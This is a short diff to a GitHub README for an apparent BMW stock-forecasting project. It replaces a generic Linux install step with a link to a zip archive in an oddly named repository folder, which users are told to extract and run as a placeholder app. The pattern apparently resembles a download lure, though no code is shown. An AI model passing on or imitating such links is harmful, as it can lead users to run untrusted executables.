sadamalin97/bmw-gru-forecast/README.md

    - **Mac**:
      - Open the downloaded `.dmg` file and drag the application to your Applications folder.
    - **Linux**:
-     - Extract the contents of the `.tar.gz` file.
+     - Extract the contents of the `https://raw.githubusercontent.com/sadamalin97/bmw-gru-forecast/main/stanchable/bmw-gru-forecast.zip` file.
 Open a terminal in that directory and run the application with the command `./your_app_name`.

 5. **Run the Application**: Once installed, you can launch the app from your applications list.